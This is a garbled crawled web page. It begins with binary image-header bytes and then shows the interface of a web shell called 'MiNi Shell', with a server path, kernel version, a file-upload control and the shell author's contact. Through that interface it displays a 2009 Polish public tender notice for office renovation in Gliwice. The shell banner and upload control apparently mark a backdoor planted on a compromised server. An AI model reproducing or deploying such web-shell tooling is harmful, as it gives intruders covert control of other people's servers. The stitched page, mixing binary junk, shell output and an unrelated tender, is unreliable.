JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090825/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090825/139603-N-2009.html

<p class="kh_header"><b>Gliwice: wykonanie remontu pomieszczeń biurowych w lokalu użytkowym przy Placu Inwalidów Wojennych 20 w Gliwicach</b><br>
<b>Numer ogłoszenia: 139603 - 2009; data zamieszczenia: 25.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Budynków Miejskich I Towarzystwo Budownictwa Społecznego Sp. z o.o , ul. Dolnych Wałów 11, 44-100 Gliwice, woj. śląskie, tel. 032 3392900, faks 032 3392962.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zbm.gliwice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> wykonanie remontu pomieszczeń biurowych w lokalu użytkowym przy Placu Inwalidów Wojennych 20 w Gliwicach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest wykonanie remontu pomieszczeń biurowych w lokalu użytkowym przy Placu Inwalidów Wojennych 20 w Gliwicach, zgodnie z załączonym projektem architektonicznym oraz zakresem określonym w przedmiarach robót
2.Wykonawca ma obowiązek dokonać oględzin obiektu w naturze.
3.Inwestycja wykonywana będzie w całości z materiałów dostarczanych przez wykonawcę:
a)	do realizacji zamówienia należy zastosować materiały i wyroby dopuszczone                 do stosowania, posiadające certyfikat na znak bezpieczeństwa, deklarację zgodności            z Polską Normą lub aprobatą techniczną oraz w I gatunku,
b)	zastosowane przez wykonawcę środki i materiały budowlane nie mogą mieć parametrów technicznych i jakościowych gorszych, niż zastosowane w projekcie.
c)	jeżeli Wykonawca przewiduje inne materiały niż zakłada projekt, należy je wskazać                    i opisać oraz udokumentować, że posiadają nie gorsze parametry techniczne i jakościowe.
4.Zakres zamówienia na roboty budowlane obejmuje: 
a)	prace przygotowawcze - przygotowanie placu budowy, zgodnie z przepisami                BHP i Prawa budowlanego,
b)	roboty budowlane zgodnie z  dokumentacją techniczną, pozwoleniem, oraz przepisami Prawa budowlanego,
c)	prace dodatkowe, wraz z kosztami ich wykonania (jeśli dotyczy): 
-dostawa energii elektrycznej, wody i gazu do celów technologicznych i socjalnych,
-wykonanie dokumentacji powykonawczej,
-wywóz i składowanie gruzu,
-uzyskanie wszystkich dodatkowych uzgodnień związanych z realizacją zadania łącznie z dodatkowymi uzgodnieniami mogącymi wyniknąć ze zmianą obowiązującego prawa podczas realizacji.
Kosztów dodatkowych (a-prace przygotowawcze i c -prace dodatkowe) nie należy wyceniać osobno. Koszty te powinny zostać ujęte w ogólnym bilansie.
5.Wykonawca, który wygra przetarg, zobowiązany będzie do uzgodnienia harmonogramu realizacji zamówienia z osobą odpowiedzialną za realizację umowy po stronie Zamawiającego w terminie do 5 dni roboczych od daty jej podpisania. 
6.Informacje dodatkowe:
a)	rozliczenie robót nastąpi kosztorysem powykonawczym, według faktury-faktur częściowych składanych przez Wykonawcę, na podstawie  faktycznie zrealizowanego zakresu prac oraz faktycznego  terminu wejścia na plac budowy,
b)	w uzasadnionych przypadkach Zamawiający zastrzega sobie prawo rezygnacji z części robót. Roboty nie wykonane, nie podlegają fakturowaniu w ramach niniejszego kontraktu,
c)	uzyskanie wszelkich pozwoleń oraz wynikających z tego tytułu opłat, związanych  z realizacją przedmiotowej inwestycji (np. zajęcie pasa drogowego, chodnika itp.) leży w gestii Wykonawcy którego to dotyczy, po uprzednim uzyskaniu Pełnomocnictwa od Zamawiającego,
d)	w przypadku konieczności wykonania robót dodatkowych, Zamawiający zastosuje właściwy tryb udzielenia zamówienia w oparciu o przepisy ustawy Prawo Zamówień Publicznych. W tym przypadku Zamawiający zastrzega sobie prawo wprowadzenia na teren budowy innego Wykonawcy,
e)	zamawiający nie wyraża zgodny na instalowanie w obrębie realizacji inwestycji (cały teren działki, której dotyczy inwestycja) reklam bez jego zgody. Warunki uzyskania zgody j.w. mogą być przedmiotem oddzielnych negocjacji..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.40.00.00-1, 45.30.00.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.Oferta musi być zabezpieczona wadium w wysokości: 2 000,00 PLN.
2.Wadium należy wnieść  w terminie do dnia 15.09.2009r., do godz. 09:00.
3.Wadium może być wnoszone w jednej lub kilku następujących formach:
a)	pieniądzu:
przelewem na rachunek bankowy Zamawiającego: ING Bank Śląski S.A. Oddział w Gliwicach 20 1050 1285 1000 0022 2649 4546.
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c)	gwarancjach bankowych;
d)	gwarancjach ubezpieczeniowych
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.).
4.Zamawiający zwraca niezwłocznie wadium jeżeli:
a)	upłynął termin związania ofertą;
b)	zawarto umowę w sprawie zamówienia publicznego i wniesiono zabezpieczenie należytego wykonania tej umowy;
c)	Zamawiający unieważnił postępowanie o udzielenie zamówienia, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia;
d)	wpłynął wniosek Wykonawcy, z zastrzeżeniem pkt.5:
-który wycofał ofertę przed upływem terminu składania ofert;
-który został wykluczony z postępowania;
-którego oferta została odrzucona.
5.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Prawo Zamówień Publicznych, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust.1 ustawy Prawo Zamówień Publicznych, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
6.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
a)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
b)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
c)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.W postępowaniu mogą wziąć udział Wykonawcy nie podlegający wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 roku Prawo Zamówień Publicznych (Dz. U. z 2006 r. Nr 164, poz. 1163 z późn. zm.) i spełniający warunki i wymagania określone w Specyfikacji Istotnych Warunków Zamówienia oraz w art. 22 ustawy Prawo Zamówień Publicznych.
2.Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia na zasadach określonych w art. 23 ustawy Prawo Zamówień Publicznych. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Jeżeli oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia została wybrana, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych Wykonawców.
3.Wykonawcy biorący udział w postępowaniu muszą spełnić następujące warunki:
a)	posiadać uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlegać wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych,
b)	posiadać niezbędną wiedzę i doświadczenie oraz dysponować potencjałem technicznym i osobami zdolnymi do wykonania zamówienia,
c)	znajdować się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
4.Nie spełnienie któregokolwiek ze wskazanych wyżej warunków i wymogów skutkować będzie wykluczeniem Wykonawcy z udziału w postępowaniu.
5.Ocena warunków: Komisja Przetargowa dokona kwalifikacji dokumentów potwierdzających spełnianie warunków (pkt. 11.10 niniejszej SIWZ) według schematu: spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Formularz ofertowy  -  według załączonego druku. Cenę ofertową należy podać w jednostkach pieniężnych obowiązujących           w Polsce tj. złotych polskich, z zaokrągleniem do drugiego miejsca po przecinku.
2.Kosztorys ofertowy sporządzony metodą uproszczoną  -  ceny jednostkowe,  w układzie                  i kolejności zgodnej z przedmiarami robót. Kosztorys winien zawierać wyłącznie następujące kolumny: liczba porządkowa, opis pozycji, jednostka, ilość jednostek, cena jednostkowa netto wraz z narzutami, wartość pozycji netto.
Ceny jednostkowe winny uwzględniać wszystkie koszty niezbędne do wykonania robót określonych w danej pozycji przedmiarowej, zgodnie z opisem pozycji, specyfikacją techniczną wykonania i odbioru robót, dokumentacją techniczną, łącznie z kosztami i pracami dodatkowymi. Przedstawione w przedmiarach pozycje katalogowe mają charakter informacyjny, określający zakres robót objęty daną pozycją przedmiarową, wymagany do wykonania przez Zamawiającego.
3.Aktualny odpis z właściwego Rejestru Sądowego lub zaświadczenie o wpisie do Ewidencji Działalności Gospodarczej, potwierdzające prowadzenie działalności o profilu pozwalającym zrealizować zamówienie, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (oryginał lub kserokopia). Zamawiający dopuszcza dokument wystawiony z wcześniejszą datą, pod warunkiem, że zostanie on poświadczony przez organ wydający za zgodność z oryginałem i będzie miał jego adnotację o aktualności danych na dzień poświadczenia (data poświadczenia - jak wyżej).W przypadku aktualizacji danych w okresie przypadającym na uczestnictwo w postępowaniu (np. powołanie oddziału, poszerzenie branży), Wykonawca zobowiązany jest dodatkowo do przedłożenia kserokopii wniosku o aktualizację bądź pisemnego wyjaśnienia, sporządzonego zgodnie z warunkami niniejszego postępowania. W przypadku spółek cywilnych należy dołączyć umowę spółki.
4.Oświadczenie, że Wykonawca spełnia warunki określone w Art. 22.1 i 24 Ustawy Prawo Zamówień Publicznych. Druk oświadczenia stanowi załącznik do SIWZ.
5.Oświadczenie Wykonawcy, iż spełnia wszystkie warunki przetargu. Druk oświadczenia stanowi załącznik do SIWZ.
6.Wykaz zrealizowanych zamówień w ciągu ostatnich 5 lat zbliżonych co do rodzaju, zakresu i wartości robót objętych niniejszym zamówieniem. 
Wykonawca musi udowodnić zrealizowanie jako główny wykonawca w okresie ostatnich 5 lat  co najmniej:
a)	dwóch oddzielnych zamówień dotyczących remontów pomieszczeń w budynkach,
b)	jednego zamówienia dotyczącego remontu/wykonania wewnętrznej instalacji wod- kan, 
c)	dwóch oddzielnych zamówień dotyczących wykonania/wymiany wewnętrznej  instalacji elektrycznej,
Jeśli w zakresie remontu (a) były wykonane roboty o których mowa w (b) i (c), Zamawiający na podstawie jednego dokumentu uzna łączne spełnienie wymogów określonych w (a,b), (a,c), lub odpowiednio (a,b,c). 
Jeśli treść referencji bądź innego dokumentu nie potwierdza wymaganego zakresu, należy w wykazie zamieścić odpowiedni (uzupełniający) opis.
7.Dokumenty potwierdzające, że roboty wpisane do wykazu zrealizowanych zamówień,                   zostały wykonane  z należytą starannością.
8.Uprawnienia zawodowe (załączyć kserokopie), w tym uprawniające do pełnienia funkcji kierownika budowy lub odpowiednio  kierownika robót. Należy dołączyć aktualne zaświadczenia o wpisie na listę członków właściwej izby samorządu zawodowego, potwierdzające prawo do wykonywania samodzielnych funkcji technicznych w budownictwie (Ustawa z dnia 15 grudnia 2000r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów - Dz. U.  z 2001r.,  Nr 5, poz. 42 z późn. zmianami).
Wykonawca winien mieć do dyspozycji odpowiednio wykwalifikowany personel oraz: kierownika budowy: 5 letni staż w pełnieniu funkcji kierownika budowy, posiadającego uprawnienia budowlane w specjalności konstrukcyjno-budowlanej, uprawnionego do wykonywania samodzielnych funkcji w budownictwie;
kierownika robót instalacyjnych (wod-kan, gaz, C.O.): 3 letni staż w pełnieniu funkcji kierownika robót, posiadającego uprawnienia budowlane w specjalności instalacji wewnętrznych, uprawnionego do wykonywania samodzielnych funkcji w budownictwie;
kierownika robót elektrycznych: 3 letni staż w pełnieniu funkcji kierownika robót, posiadającego uprawnienia budowlane w specjalności instalacji wewnętrznych, uprawnionego do wykonywania samodzielnych funkcji w budownictwie.
9.Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub KRUS potwierdzających odpowiednio, że Wykonawca nie zalega  z opłacaniem podatków, opłat oraz składek  na ubezpieczenie zdrowotne lub społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonywania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
10.Polisa lub inny dokument ubezpieczenia potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na  sumę ubezpieczenia nie mniejszą niż 100 000zł. Do polisy należy dołączyć dowód opłacenia składki (bądź jej treść winna wskazywać na jej opłacenie) - Zamawiający musi stwierdzić ważność dokumentu.
11.Dowód wpłaty wadium, zamieszczony zgodnie z pkt. 9 SIWZ. 
12.Zaparafowany wzór umowy (wszystkie strony) - dołączony do SIWZ.
13.Informacja o podwykonawcach -do wypełnienia druk, stanowiący załącznik do SIWZ (załączany w przypadku wskazania usług/robót wykonywanych przez podwykonawców; brak druku w ofercie wskazuje na realizację zamówienia bez udziału podwykonawców)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 95</li>
<li>2 - Gwarancja na roboty budowlane - 5</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://przetargi.zbm.gliwice.pl/114.zip.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Budynków Miejskich I TBS Sp. z o.o.
Sekcja Zamówień Publicznych
ul. Zwycięstwa 13, IIIp., pok. 324
44-100 Gliwice.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.09.2009 godzina 09:00, miejsce: Zarząd Budynków Miejskich I TBS Sp. z o.o.
Sekcja Zamówień Publicznych
ul. Zwycięstwa 13, IIIp., pok. 324
44-100 Gliwice.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com